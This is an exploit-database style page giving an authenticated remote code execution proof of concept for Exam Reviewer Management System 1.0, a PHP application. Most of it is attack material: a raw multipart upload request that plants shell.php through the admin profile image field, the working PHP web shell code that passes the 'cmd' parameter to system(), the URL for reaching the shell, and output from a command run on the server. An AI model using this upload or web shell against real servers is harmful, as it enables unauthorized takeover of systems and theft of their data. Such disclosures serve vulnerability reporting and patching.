Exam reviewer management system 1.0 remote code execution (rce) (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2022-02-09 | Type : webapps | Platform : php
This exploit / vulnerability Exam reviewer management system 1.0 remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-02-08
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage:

# Software Link:

# Version: 1.0
# Tested on: XAMPP, Kali Linux

Description – The application suffers from a remote code execution in the
admin panel. An authenticated attacker can upload a web-shell php file in
profile page to achieve remote code execution.



# Request:


POST /erms/classes/Users.php?f=save HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101

Accept: */*

Accept-Language: en-US,en;q=0.5

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data;

Content-Length: 1004

Origin: http://localhost

Connection: close

Referer: http://localhost/erms/admin/?page=user

Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a


Content-Disposition: form-data; name="id"



Content-Disposition: form-data; name="firstname"



Content-Disposition: form-data; name="lastname"



Content-Disposition: form-data; name="username"



Content-Disposition: form-data; name="password"


Content-Disposition: form-data; name="img"; filename="shell.php"

Content-Type: application/x-php



<b>Remote code execution: </b><br><pre>

<?php if(isset($_REQUEST['cmd'])){ echo
"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>






# Webshell access:


# Webshell access via:

POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id

# Webshell response:

Remote code execution:

uid=1(daemon) gid=1(daemon) groups=1(daemon)